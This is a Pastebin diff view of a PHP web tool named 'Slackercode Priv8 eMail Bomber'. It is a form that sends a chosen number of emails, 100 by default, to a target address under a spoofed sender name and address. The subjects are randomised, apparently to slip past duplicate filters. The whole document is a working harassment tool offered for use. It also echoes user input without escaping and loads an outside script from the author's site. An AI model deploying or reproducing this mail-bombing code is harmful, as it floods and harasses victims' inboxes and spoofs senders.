View difference between Paste ID: ntMeuSny and mJk2iubc
SHOW: | | - or go back to the newest paste.
1
<?php
2
/**
3
* Slackercode Priv8 eMail Bomber
4
* coded by Alecs on Sublime Text 3
5
* 28 October 2013
6
* [email protected]
7
**/
8
9
$kontol = 'Ready to send eMail..';
10
11
function boombardir($text){
12
	if (!get_magic_quotes_gpc()){
13
		return $text;
14
	}
15
	return stripslashed($text);
16
}
17
if(isset($_POST['kirim_email'])){
18
	$mail_to = $_POST['mail_to'];
19
	$fromname = $_POST['from_name'];
20
	$fromaddress = $_POST['mail_from'];
21
	$mail_subject = $_POST['mail_subject'];
22
	$mail_content = boombardir($_POST['mail_content']);
23
24
	$fuckline = "\n\t";
25
	$headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
26
27
	if (($_POST['banyak_email']) <=1) {
28
		if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
29
			$kontol = "email sent to $mail_to";
30
		}
31
		else $kontol = "Mail Sending is <font color=red> Failed </font> .";
32
	}
33
	elseif (($_POST['banyak_email']) > 1){
34
		$intibom = $_POST['banyak_email'];
35
		$kabehe = 0; $kabehekirim=0; $msgtf=0;
36
		for ($i=1; $i <= $intibom; $i++) {
37
			$acakjudul = substr(md5($i."slackerc0de"),-4);
38
			$mailsubject = $mail_subject." - ".$acakjudul;
39
			if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
40
				$kabehekirim++;
41
			} else {
42
				$msgtf++;
43
			}
44
			$kabehe++;
45
		}
46
	$kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
47
	}
48
}
49
?>
50
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
51
<html xmlns="http://www.w3.org/1999/xhtml">
52
53
<head>
54
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
55
<title>Slackercode Priv8 Tool</title>
56
<link rel="SHORCUT ICON" href="http://slackerc0de.us/favicon.ico">
57
<style type="text/css">
58
body {
59
	width: 600px;
60
	margin: auto;
61
	color: #31B404;
62
	font-size: 12px;
63
	background: #000;
64
	font-family: verdana, sans-serif;
65
}
66
textarea {
67
	background: #111111;
68
	border: 0;
69
	padding: 2px;
70
	border: dashed 1px #696969;
71
	border-collapse: collapse;
72
	font-size: 13px; 
73
	color: #ffffff;
74
}
75
input {
76
	font-size: 12px;
77
	color: #0B610B;
78
	background: #111;
79
	border: dashed 1px #696969;
80
	border-collapse: collapse;
81
	padding: 2px;
82
}
83
a, a:hover { font-weight: bold; text-decoration: none; }
84
a:hover { border-bottom: 1px solid #40FF00; }
85
td { font-size: 12px; }
86
.brd { -moz-border-radius: 10px; border-radius: 10px; }
87
</style>
88
</head>
89
90
<body>
91
<br /><br />
92
<form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
93
<table style="padding: 0 0 0 30px">
94
<tr><td>
95
</td></tr>
96
<center><img src="http://s25.postimg.org/gdpjtjzzj/logo_sc_tool.png"/><br /> 
97
<font color="#01DF01">Slackercode Priv8 eMail Bomber</font></center>
98
<tr><td><br />
99
	<table style="padding: 0 0 0 30px">
100
		<tr><td width="100">Target eMail :<td width="300">
101
			<input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
102
		</tr></td>
103
		<tr><td>Sender Name :<td width="300">
104
			<input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
105
		</tr></td>
106
		<tr><td>Sender eMail :<td width="300">
107
			<input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
108
		</tr></td>
109
		<tr><td>Subject :<td width="300">
110
			<input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
111
		</tr></td>
112
		<tr><td>Total of Send :<td width="300">
113
			<input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
114
			<input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
115
		</tr></td>
116
	</table>
117
</td></tr>
118
<tr><td><br />
119
Message :
120
<center>
121
	<textarea name="mail_content" cols="60" rows="8" >
122
		<?php
123
			if ($mail_content) {
124
				echo "mail_content";
125
			}
126
		?>
127
	</textarea>
128
</center>
129
</td></tr>
130
</table>
131
</form><br />
132
<div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
133
	<?php
134
		echo "$kontol";
135
	?>
136
</div><br />
137
<center><script type="text/javascript" src="http://slackerc0de.us/js/flashneon.js"></script></center>
138
</body>
139
</html>